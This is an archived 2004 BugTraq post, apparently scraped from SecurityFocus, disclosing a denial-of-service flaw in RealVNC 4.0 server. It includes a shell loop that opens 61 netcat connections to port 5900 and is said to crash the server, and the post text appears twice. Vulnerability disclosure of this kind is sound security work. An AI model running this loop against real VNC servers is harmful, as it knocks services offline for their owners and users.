BugTraq
Back to list
|
Post reply
RealVNC 4.0 DoS
Aug 25 2004 05:11PM
Allan Zhang (zhangliangsd hotmail com)
It will cause RealVNC server die if there are more than 60 connections.
Tested against RealVNC serveron W2k using the following script:
for i in `seq 1 61`
do
nc <server_ip> 5900
done
This will impact version before 4.0 also.
Thanks
Allan
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
It will cause RealVNC server die if there are more than 60 connections.
Tested against RealVNC serveron W2k using the following script:
for i in `seq 1 61`
do
nc <server_ip> 5900
done
This will impact version before 4.0 also.
Thanks
Allan
[ reply ]